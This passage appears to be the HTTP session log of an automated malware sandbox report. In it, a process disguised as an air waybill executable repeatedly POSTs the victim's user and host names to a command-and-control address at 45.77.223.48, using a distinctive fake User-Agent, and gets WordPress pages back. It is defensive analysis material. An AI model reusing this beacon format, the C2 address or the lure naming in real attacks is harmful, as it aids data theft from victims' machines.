                                              Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
                                              Apr 25, 2024 09:42:50.663171053 CEST1289INData Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61
                                              Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              41192.168.2.44979145.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:50.920365095 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:51.051470041 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:51.893538952 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:50 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:51.893675089 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:51.893755913 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:51.901823044 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:51.902108908 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:51.902261019 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:51.902535915 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:51.902663946 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:51.902707100 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:51.902807951 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              42192.168.2.44979245.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:52.171896935 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:52.299145937 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:53.244693041 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:52 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:53.244715929 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:53.244733095 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:53.251873016 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:53.252248049 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:53.252516031 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:53.252655029 CEST1289INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
                                              Apr 25, 2024 09:42:53.252681017 CEST1289INData Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c
                                              Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
                                              Apr 25, 2024 09:42:53.252847910 CEST1289INData Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52
                                              Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
                                              Apr 25, 2024 09:42:53.252892017 CEST1289INData Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61
                                              Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              43192.168.2.44979345.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:53.510184050 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:53.637377024 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:54.453133106 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:53 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:54.453160048 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:54.461505890 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:54.461931944 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:54.462101936 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:54.462296009 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:54.462393999 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:54.462497950 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:54.462551117 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                              Apr 25, 2024 09:42:54.462606907 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                              Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              44192.168.2.44979445.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:54.719782114 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:54.845704079 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:55.652230024 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:54 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:55.652302980 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:55.652367115 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:55.661103010 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:55.661510944 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:55.661721945 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:55.662125111 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:55.662143946 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:55.662159920 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:55.662178040 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              45192.168.2.44979545.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:55.953897953 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:56.079916954 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:56.925452948 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:56 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:56.925470114 CEST22INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20
                                              Data Ascii: <!DOCTYPE html><html
                                              Apr 25, 2024 09:42:56.925493956 CEST12INData Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22
                                              Data Ascii: lang="en-US"
                                              Apr 25, 2024 09:42:56.925635099 CEST25INData Raw: 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: ><head><meta charset="
                                              Apr 25, 2024 09:42:56.925757885 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
